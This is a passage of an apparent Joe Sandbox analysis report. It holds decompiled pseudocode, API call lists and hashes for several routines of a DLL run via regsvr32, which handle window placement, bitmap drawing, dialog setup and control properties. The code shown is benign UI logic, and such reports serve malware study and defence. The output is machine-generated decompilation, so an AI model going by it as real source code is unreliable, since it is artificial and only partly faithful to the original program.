                                                                                                                  • Part of subcall function 1003881C: GetWindowRect.USER32 ref: 10038880
                                                                                                                  • Part of subcall function 1001D569: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,100197B3,?), ref: 1001D58F
                                                                                                                • GetParent.USER32(?), ref: 10038D24
                                                                                                                  • Part of subcall function 100387A2: SetParent.USER32(?,00000000), ref: 100387B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: RectWindow$Parent$CopyEqualException@8H_prolog3ThrowVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 388495236-0
                                                                                                                • Opcode ID: ed74ff252d5a82ab7c81688154af753055f34a0159d371e18ad7e48c8e7aaed9
                                                                                                                • Instruction ID: 4e1fd3bea64b962a28d7a9cb0a9681322e3091f941260babb80376738b62fef7
                                                                                                                • Opcode Fuzzy Hash: ed74ff252d5a82ab7c81688154af753055f34a0159d371e18ad7e48c8e7aaed9
                                                                                                                • Instruction Fuzzy Hash: AF718A71A007099FDF12DFA8CC81BAEB7B9FB44301F144669E55AEF195DB30AA44CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 41%
                                                                                                                			E10038DB9(intOrPtr __ecx, void* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t61;
                                                                                                                				signed char _t68;
                                                                                                                				signed int _t73;
                                                                                                                				intOrPtr _t112;
                                                                                                                				void* _t113;
                                                                                                                				signed int _t118;
                                                                                                                				signed int _t120;
                                                                                                                				void* _t137;
                                                                                                                				RECT* _t139;
                                                                                                                				void* _t141;
                                                                                                                				intOrPtr _t143;
                                                                                                                				void* _t144;
                                                                                                                				signed int _t146;
                                                                                                                				void* _t148;
                                                                                                                				void* _t149;
                                                                                                                
                                                                                                                				_t137 = __edx;
                                                                                                                				_t114 = __ecx;
                                                                                                                				_t146 = _t148 - 0xb0;
                                                                                                                				_t149 = _t148 - 0x130;
                                                                                                                				_t61 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t146 + 0xac) = _t61 ^ _t146;
                                                                                                                				_t143 =  *((intOrPtr*)(_t146 + 0xb8));
                                                                                                                				_t139 =  *(_t146 + 0xbc);
                                                                                                                				_t112 = __ecx;
                                                                                                                				_t152 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t146 - 0x6c)) = _t143;
                                                                                                                				 *(_t146 - 0x70) = _t139;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					L1:
                                                                                                                					E1001729E(_t112, _t114, _t139, _t143, _t152);
                                                                                                                				}
                                                                                                                				if(_t143 == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t65 = GetWindowRect( *(_t143 + 0x20), _t146 - 0x80);
                                                                                                                				if( *((intOrPtr*)(_t143 + 0x8c)) != _t112 || _t139 != 0 && EqualRect(_t146 - 0x80, _t139) == 0) {
                                                                                                                					if( *((intOrPtr*)(_t112 + 0x94)) != 0 && ( *(_t143 + 0x84) & 0x00000040) != 0) {
                                                                                                                						 *(_t112 + 0x80) =  *(_t112 + 0x80) | 0x00000040;
                                                                                                                					}
                                                                                                                					 *(_t112 + 0x80) =  *(_t112 + 0x80) & 0xfffffff9;
                                                                                                                					_t68 =  *(_t143 + 0x80) & 0x00000006 |  *(_t112 + 0x80);
                                                                                                                					_t160 = _t68 & 0x00000040;
                                                                                                                					 *(_t112 + 0x80) = _t68;
                                                                                                                					if((_t68 & 0x00000040) == 0) {
                                                                                                                						_push(0x104);
                                                                                                                						_push(_t146 - 0x58);
                                                                                                                						E1001D878(_t112, _t143, _t137, _t139, _t143, _t160);
                                                                                                                						E1002D750(_t143, _t137,  *((intOrPtr*)(_t112 + 0x20)), _t146 - 0x58);
                                                                                                                					}
                                                                                                                					_t73 = ( *(_t143 + 0x80) ^  *(_t112 + 0x80)) & 0x0000f000 ^  *(_t143 + 0x80) | 0x00000f00;
                                                                                                                					if( *((intOrPtr*)(_t112 + 0x94)) == 0) {
                                                                                                                						_t74 = _t73 & 0xfffffffe;
                                                                                                                						__eflags = _t73 & 0xfffffffe;
                                                                                                                					} else {
                                                                                                                						_t74 = _t73 | 0x00000001;
                                                                                                                					}
                                                                                                                					E10035BBE(_t143, _t74);
                                                                                                                					_push(0xffffffff);
                                                                                                                					_t140 = E100387C0(_t112, GetDlgCtrlID( *(_t143 + 0x20)) & 0x0000ffff);
                                                                                                                					if(_t140 > 0) {
                                                                                                                						 *((intOrPtr*)(E10011520(_t112, _t112 + 0x98, _t140, _t143, _t146, _t140))) = _t143;
                                                                                                                					}
                                                                                                                					if( *(_t146 - 0x70) == 0) {
                                                                                                                						__eflags = _t140 - 1;
                                                                                                                						if(_t140 < 1) {
                                                                                                                							_t140 = _t112 + 0x98;
                                                                                                                							E1001F82B(_t112, _t112 + 0x98, _t146,  *((intOrPtr*)(_t112 + 0xa0)), _t143);
                                                                                                                							E1001F82B(_t112, _t140, _t146,  *((intOrPtr*)(_t140 + 8)), 0);
                                                                                                                						}
                                                                                                                						_t118 =  *0x10070c84; // 0x2
                                                                                                                						_push(0x115);
                                                                                                                						__eflags = 0;
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push( ~_t118);
                                                                                                                						_t120 =  *0x10070c80; // 0x2
                                                                                                                						_push( ~_t120);
                                                                                                                						_push(0);
                                                                                                                					} else {
                                                                                                                						CopyRect(_t146 - 0x68,  *(_t146 - 0x70));
                                                                                                                						E10024274(_t112, _t146 - 0x68);
                                                                                                                						if(_t140 < 1) {
                                                                                                                							asm("cdq");
                                                                                                                							asm("cdq");
                                                                                                                							_push(( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)) - _t137 >> 1) +  *((intOrPtr*)(_t146 - 0x64)));
                                                                                                                							_push(( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68) - _t137 >> 1) +  *(_t146 - 0x68));
                                                                                                                							_t140 = _t149 - 0x10;
                                                                                                                							_push( *((intOrPtr*)(_t146 - 0x6c)));
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							E1003881C(_t112);
                                                                                                                							_t143 =  *((intOrPtr*)(_t146 - 0x6c));
                                                                                                                						}
                                                                                                                						_push(0x114);
                                                                                                                						_push( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)));
                                                                                                                						_push( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68));
                                                                                                                						_push( *((intOrPtr*)(_t146 - 0x64)));
                                                                                                                						_push( *(_t146 - 0x68));
                                                                                                                						_push(0);
                                                                                                                					}
                                                                                                                					E1001D569(_t143);
                                                                                                                					if(E10019C16(_t112, _t143, _t146, GetParent( *(_t143 + 0x20))) != _t112) {
                                                                                                                						E100387A2(_t143, _t112);
                                                                                                                					}
                                                                                                                					_t123 =  *((intOrPtr*)(_t143 + 0x8c));
                                                                                                                					if( *((intOrPtr*)(_t143 + 0x8c)) != 0) {
                                                                                                                						E100389FA(_t123, _t140, _t143, 0xffffffff, 0);
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t143 + 0x8c)) = _t112;
                                                                                                                					 *(E10035A2F(_t112) + 0xd0) =  *(_t65 + 0xd0) | 0x0000000c;
                                                                                                                				}
                                                                                                                				_pop(_t141);
                                                                                                                				_pop(_t144);
                                                                                                                				_pop(_t113);
                                                                                                                				return E1003B437(_t65, _t113,  *(_t146 + 0xac) ^ _t146, _t137, _t141, _t144);
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32 ref: 10038DFF
                                                                                                                • EqualRect.USER32 ref: 10038E1A
                                                                                                                • GetDlgCtrlID.USER32 ref: 10038EB9
                                                                                                                • CopyRect.USER32(?,?), ref: 10038EEB
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                  • Part of subcall function 1003881C: GetWindowRect.USER32 ref: 10038880
                                                                                                                  • Part of subcall function 1001D569: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,100197B3,?), ref: 1001D58F
                                                                                                                • GetParent.USER32(?), ref: 10038F9F
                                                                                                                  • Part of subcall function 100387A2: SetParent.USER32(?,00000000), ref: 100387B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Window$Parent$CopyCtrlEqualException@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 964284190-0
                                                                                                                • Opcode ID: dccad42ae92f6f5b05f0c80e409acbdf06ff7fd4e95d2babd0cd76162e7c52a6
                                                                                                                • Instruction ID: 8abfab7fc1dea632dc0ce556bfa7ea42c41ffa266d980b6fd6dd8bdd91c69bf5
                                                                                                                • Opcode Fuzzy Hash: dccad42ae92f6f5b05f0c80e409acbdf06ff7fd4e95d2babd0cd76162e7c52a6
                                                                                                                • Instruction Fuzzy Hash: C861AE75A007059FDB16DFA8CC81BAEB7BAFF48301F004669E95ADF191DB30A945CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E100049A0(void* __ebx, int _a4, int _a8, int _a12, int _a16, intOrPtr _a32) {
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v20;
                                                                                                                				int _v28;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				void _v64;
                                                                                                                				int _v80;
                                                                                                                				void* _v84;
                                                                                                                				int _v88;
                                                                                                                				char _v92;
                                                                                                                				char _v96;
                                                                                                                				struct HDC__* _v104;
                                                                                                                				intOrPtr _v112;
                                                                                                                				char _v152;
                                                                                                                				char _v160;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t45;
                                                                                                                				void* _t49;
                                                                                                                				int _t53;
                                                                                                                				void* _t73;
                                                                                                                				int _t80;
                                                                                                                				int _t96;
                                                                                                                				void* _t102;
                                                                                                                				intOrPtr* _t109;
                                                                                                                				void* _t111;
                                                                                                                				void* _t117;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051020);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t111);
                                                                                                                				_push(_t102);
                                                                                                                				_t45 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t45 ^ _t117 - 0x00000030);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t121 = _a32;
                                                                                                                				if(_a32 == 0) {
                                                                                                                					_t49 = E10024A9A(_a4,  &_a8, 0xf7f8f9);
                                                                                                                					 *[fs:0x0] = _v20;
                                                                                                                					return _t49;
                                                                                                                				} else {
                                                                                                                					_t109 = _a4;
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 0x24))))(7);
                                                                                                                					_t96 = _a16 - 2;
                                                                                                                					_a16 = _t96;
                                                                                                                					_t80 = _a8 + 1;
                                                                                                                					_t53 = _a4 + 0x19;
                                                                                                                					_a4 = _t53;
                                                                                                                					_a8 = _t80;
                                                                                                                					Rectangle( *(_t109 + 4), _t53, _t80, _a12, _t96);
                                                                                                                					_v80 = 0;
                                                                                                                					_v84 = 0x100572e4;
                                                                                                                					_v28 = 0;
                                                                                                                					E100247F5( &_v84, _t102, _t111, LoadBitmapA( *(E10023187(__ebx, _t102, _t109, _t121) + 0xc), 0xa8));
                                                                                                                					GetObjectA(_v84, 0x18,  &_v64);
                                                                                                                					E10023F76( &_v92);
                                                                                                                					_v44 = 1;
                                                                                                                					E1002452E( &_v96, _t102, _t111, CreateCompatibleDC( *(_t109 + 4)));
                                                                                                                					E1002487A(_v96, _v104);
                                                                                                                					StretchBlt( *(_t109 + 4), _v48 + 1, _v44 + 1, _v40 - _v48 - 2, _v36 - _v44 - 2, _v104, 0, 0, _v88, _v84, 0xcc0020);
                                                                                                                					E10024848( &_v160);
                                                                                                                					_v104 = 0;
                                                                                                                					E100245A8( &_v152);
                                                                                                                					_v104 = 0xffffffff;
                                                                                                                					_v160 = 0x100572c4;
                                                                                                                					_t73 = E10024848( &_v160);
                                                                                                                					 *[fs:0x0] = _v112;
                                                                                                                					return _t73;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 10004A0D
                                                                                                                • LoadBitmapA.USER32 ref: 10004A39
                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 10004A55
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10004A6D
                                                                                                                  • Part of subcall function 1002487A: SelectObject.GDI32(?,?), ref: 10024882
                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 10004ACC
                                                                                                                  • Part of subcall function 100245A8: DeleteDC.GDI32(00000000), ref: 100245BA
                                                                                                                  • Part of subcall function 10024848: DeleteObject.GDI32(00000000), ref: 10024857
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Delete$BitmapCompatibleCreateLoadRectangleSelectStretch
                                                                                                                • String ID:
                                                                                                                • API String ID: 448305663-0
                                                                                                                • Opcode ID: 82c9b20964a963aab4da962e57504df09b53ac431a8e4d5cce0c4bbee5d3ec72
                                                                                                                • Instruction ID: 5d69bfcb4a3c229f910bdf040e5aadc79639dc101085ecbd92b3a03dd67eb75c
                                                                                                                • Opcode Fuzzy Hash: 82c9b20964a963aab4da962e57504df09b53ac431a8e4d5cce0c4bbee5d3ec72
                                                                                                                • Instruction Fuzzy Hash: BE4145BA2083819FD314DF68D885F5BBBE8FB88710F00891DF58583291DB75E908CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10021F4B(void* __ebx, intOrPtr __ecx, void* __edx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t70;
                                                                                                                				signed int _t72;
                                                                                                                				char* _t89;
                                                                                                                				intOrPtr _t92;
                                                                                                                				void* _t101;
                                                                                                                				char* _t102;
                                                                                                                				signed char _t103;
                                                                                                                				intOrPtr _t118;
                                                                                                                				void* _t119;
                                                                                                                				void* _t120;
                                                                                                                				signed int _t129;
                                                                                                                
                                                                                                                				_t115 = __edi;
                                                                                                                				_t110 = __edx;
                                                                                                                				_push(0xa4);
                                                                                                                				E1003D24F(E1005362D, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t119 - 0xac)) =  *((intOrPtr*)(_t119 + 0x10));
                                                                                                                				 *((intOrPtr*)(_t119 - 0xa8)) =  *((intOrPtr*)(_t119 + 0x18));
                                                                                                                				_t118 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t119 - 0xb0)) = __ecx;
                                                                                                                				E10020D23(__ecx, 0,  *((intOrPtr*)(_t119 + 0x1c)));
                                                                                                                				 *((intOrPtr*)(_t119 - 4)) = 0;
                                                                                                                				 *((intOrPtr*)(__ecx)) = 0x1005b3a4;
                                                                                                                				E100010F0(__ecx + 0x7c, __edx);
                                                                                                                				 *((char*)(_t119 - 4)) = 1;
                                                                                                                				if( *((intOrPtr*)(_t119 + 0x20)) == 0) {
                                                                                                                					_t115 = 0x94;
                                                                                                                					E1003BB70(0x94, _t119 - 0xa4, 0, 0x94);
                                                                                                                					_t120 = _t120 + 0xc;
                                                                                                                					 *(_t119 - 0xa4) = 0x94;
                                                                                                                					GetVersionExA(_t119 - 0xa4);
                                                                                                                					if( *((intOrPtr*)(_t119 - 0x94)) != 2) {
                                                                                                                						L3:
                                                                                                                						 *((intOrPtr*)(_t119 + 0x20)) = 0x4c;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(_t119 + 0x20)) = 0x58;
                                                                                                                						if( *((intOrPtr*)(_t119 - 0xa0)) < 5) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t70 = E1003B4DA(0, _t110, _t115, _t118,  *((intOrPtr*)(_t119 + 0x20)));
                                                                                                                				_t127 = _t70;
                                                                                                                				_pop(_t101);
                                                                                                                				 *((intOrPtr*)(_t118 + 0x74)) = _t70;
                                                                                                                				if(_t70 == 0) {
                                                                                                                					_t70 = E1001726A(0, _t101, _t115, _t118, _t127);
                                                                                                                				}
                                                                                                                				E1003BB70(_t115, _t70, 0,  *((intOrPtr*)(_t119 + 0x20)));
                                                                                                                				_t72 =  *(_t119 + 8);
                                                                                                                				 *(_t118 + 0x78) = _t72;
                                                                                                                				asm("sbb eax, eax");
                                                                                                                				 *((intOrPtr*)(_t118 + 0x54)) =  ~_t72 + 0x7005;
                                                                                                                				 *((intOrPtr*)(_t118 + 0x1c4)) = 0;
                                                                                                                				_t102 = _t118 + 0x80;
                                                                                                                				 *_t102 = 0;
                                                                                                                				_t116 = _t118 + 0xc0;
                                                                                                                				 *_t116 = 0;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)))) =  *((intOrPtr*)(_t119 + 0x20));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x1c)) = _t116;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x20)) = 0x104;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t119 + 0xc));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x24)) = _t102;
                                                                                                                				_t103 = 0x40;
                                                                                                                				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x28) = _t103;
                                                                                                                				_t114 =  *(_t119 + 0x14) | 0x00080020;
                                                                                                                				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) |  *(_t119 + 0x14) | 0x00080020;
                                                                                                                				if(( *(_t119 + 0x14) & _t103) != 0) {
                                                                                                                					_t92 =  *((intOrPtr*)(_t118 + 0x74));
                                                                                                                					_t48 = _t92 + 0x34;
                                                                                                                					 *_t48 =  *(_t92 + 0x34) & 0xff7fffff;
                                                                                                                					_t129 =  *_t48;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 8)) =  *((intOrPtr*)(E10023187(0, _t116, _t118, _t129) + 0xc));
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x44)) = E1003548B;
                                                                                                                				if( *((intOrPtr*)(_t119 - 0xac)) != 0) {
                                                                                                                					E10017042(0, _t116, _t118, _t119, _t116, 0x104,  *((intOrPtr*)(_t119 - 0xac)), 0xffffffff);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t119 - 0xa8)) != 0) {
                                                                                                                					_t116 = _t118 + 0x7c;
                                                                                                                					E10002070(_t114, _t118 + 0x7c,  *((intOrPtr*)(_t119 - 0xa8)));
                                                                                                                					_t88 = E10001C60(_t118 + 0x7c, 0);
                                                                                                                					while(1) {
                                                                                                                						_t89 = E1003F23E(_t88, 0x7c);
                                                                                                                						if(_t89 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						 *_t89 = 0;
                                                                                                                						_t88 = _t89 + 1;
                                                                                                                						__eflags = _t89 + 1;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0xc)) =  *((intOrPtr*)(_t118 + 0x7c));
                                                                                                                				}
                                                                                                                				return E1003D2D2(0, _t116, _t118);
                                                                                                                			}
                                                                                                                0x100220ea
                                                                                                                0x100220f4

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10021F55
                                                                                                                  • Part of subcall function 10020D23: _memset.LIBCMT ref: 10020D3A
                                                                                                                • _memset.LIBCMT ref: 10021FA8
                                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10050EB0,000000FF), ref: 10021FBD
                                                                                                                • _malloc.LIBCMT ref: 10021FE6
                                                                                                                • _memset.LIBCMT ref: 10021FFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog3_Version_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1339555267-0
                                                                                                                • Opcode ID: 3eef9a516c5fcf88d4f8e716f753cfe7c7cd0edecdaf5d76a627adc858079138
                                                                                                                • Instruction ID: 4880349b25da0f992761ceb652654c99e496bcf05ee1633afb7689df58e8127f
                                                                                                                • Opcode Fuzzy Hash: 3eef9a516c5fcf88d4f8e716f753cfe7c7cd0edecdaf5d76a627adc858079138
                                                                                                                • Instruction Fuzzy Hash: 305147B8A00B44DFDB21CF68D980A9ABBE0FF48304F41469AE9999B261C774E944CF11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E1001EDA8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t55;
                                                                                                                				signed int _t56;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_push(0x14);
                                                                                                                				E1003D1E6(E100532C8, __ebx, __edi, __esi);
                                                                                                                				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
                                                                                                                				if(_t55 > 0xf) {
                                                                                                                					L21:
                                                                                                                					_t56 = 0;
                                                                                                                				} else {
                                                                                                                					switch( *((intOrPtr*)(( *(_t55 + 0x1001ef68) & 0x000000ff) * 4 +  &M1001EF40))) {
                                                                                                                						case 0:
                                                                                                                							__eax =  *(__ebp + 0x10);
                                                                                                                							 *__eax = 2;
                                                                                                                							 *(__eax + 8) = 1;
                                                                                                                							goto L4;
                                                                                                                						case 1:
                                                                                                                							_t59 =  *((intOrPtr*)(_t68 + 0x10));
                                                                                                                							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
                                                                                                                							goto L3;
                                                                                                                						case 2:
                                                                                                                							__esi =  *(__ebp + 0x10);
                                                                                                                							__ecx =  *(__ebp + 8);
                                                                                                                							 *__esi = 0xb;
                                                                                                                							__eax = E1002EA76( *(__ebp + 8));
                                                                                                                							__eax =  ~__eax;
                                                                                                                							asm("sbb eax, eax");
                                                                                                                							 *(__esi + 8) = __ax;
                                                                                                                							goto L4;
                                                                                                                						case 3:
                                                                                                                							__eax =  *(__ebp + 0x10);
                                                                                                                							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
                                                                                                                							L3:
                                                                                                                							 *_t59 = 0xb;
                                                                                                                							goto L4;
                                                                                                                						case 4:
                                                                                                                							__eax = E100173A6();
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							__eax = E10001050(__ebp + 0xc, __edx, __eax);
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							 *(__ebp - 4) = 1;
                                                                                                                							__eax = E10004FC0(__ebp + 0xc, 0xf1c0);
                                                                                                                							goto L19;
                                                                                                                						case 5:
                                                                                                                							__esi =  *(__ebp + 0x10);
                                                                                                                							 *__esi = 3;
                                                                                                                							__eax = GetThreadLocale();
                                                                                                                							 *(__esi + 8) = __eax;
                                                                                                                							goto L4;
                                                                                                                						case 6:
                                                                                                                							__eflags =  *(__esi + 0x5c) - 0xffffffff;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_push( *(__esi + 0x20));
                                                                                                                								__ecx = __ebp - 0x20;
                                                                                                                								__eax = E10024650(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                                                                                								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
                                                                                                                								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
                                                                                                                								__eax = GetTextColor( *(__ebp - 0x18));
                                                                                                                								__ecx = __ebp - 0x20;
                                                                                                                								 *(__esi + 0x60) = __eax;
                                                                                                                								__eax = E100246A4(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
                                                                                                                							}
                                                                                                                							__eflags = __edi - 0xfffffd43;
                                                                                                                							__eax =  *(__ebp + 0x10);
                                                                                                                							 *__eax = 3;
                                                                                                                							if(__edi != 0xfffffd43) {
                                                                                                                								__esi =  *(__esi + 0x60);
                                                                                                                							} else {
                                                                                                                								__esi =  *(__esi + 0x5c);
                                                                                                                							}
                                                                                                                							 *(__eax + 8) = __esi;
                                                                                                                							goto L4;
                                                                                                                						case 7:
                                                                                                                							__eflags =  *(__esi + 0x64);
                                                                                                                							if(__eflags != 0) {
                                                                                                                								L15:
                                                                                                                								__edi =  *(__ebp + 0x10);
                                                                                                                								 *__edi = 9;
                                                                                                                								__eax =  *(__esi + 0x64);
                                                                                                                								__ecx =  *__eax;
                                                                                                                								_push(__eax);
                                                                                                                								__eax =  *((intOrPtr*)( *__eax + 4))();
                                                                                                                								__eax =  *(__esi + 0x64);
                                                                                                                								 *(__edi + 8) = __eax;
                                                                                                                								goto L4;
                                                                                                                							} else {
                                                                                                                								__ecx =  *(__esi + 0x20);
                                                                                                                								__eax = E1001E043( *(__esi + 0x20));
                                                                                                                								__ecx = __esi;
                                                                                                                								__eax = E1001EC6F(__ebx, __esi, __edi, __esi, __eflags, __eax);
                                                                                                                								__eflags =  *(__esi + 0x64);
                                                                                                                								if( *(__esi + 0x64) == 0) {
                                                                                                                									goto L21;
                                                                                                                								} else {
                                                                                                                									goto L15;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L22;
                                                                                                                						case 8:
                                                                                                                							__eax = E100173A6();
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							__eax = E10001050(__ebp + 0xc, __edx, __eax);
                                                                                                                							_t44 = __ebp - 4;
                                                                                                                							 *_t44 =  *(__ebp - 4) & 0x00000000;
                                                                                                                							__eflags =  *_t44;
                                                                                                                							L19:
                                                                                                                							__esi =  *(__ebp + 0x10);
                                                                                                                							__ecx = __ebp + 0xc;
                                                                                                                							 *__esi = 8;
                                                                                                                							__eax = E1001A203(__ebp + 0xc, __edx, __esi);
                                                                                                                							__ecx =  *(__ebp + 0xc);
                                                                                                                							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
                                                                                                                							 *(__esi + 8) = __eax;
                                                                                                                							__eax = E10001020( *(__ebp + 0xc) + 0xfffffff0, __edx);
                                                                                                                							L4:
                                                                                                                							_t56 = 1;
                                                                                                                							goto L22;
                                                                                                                						case 9:
                                                                                                                							goto L21;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L22:
                                                                                                                				return E1003D2BE(_t56);
                                                                                                                			}






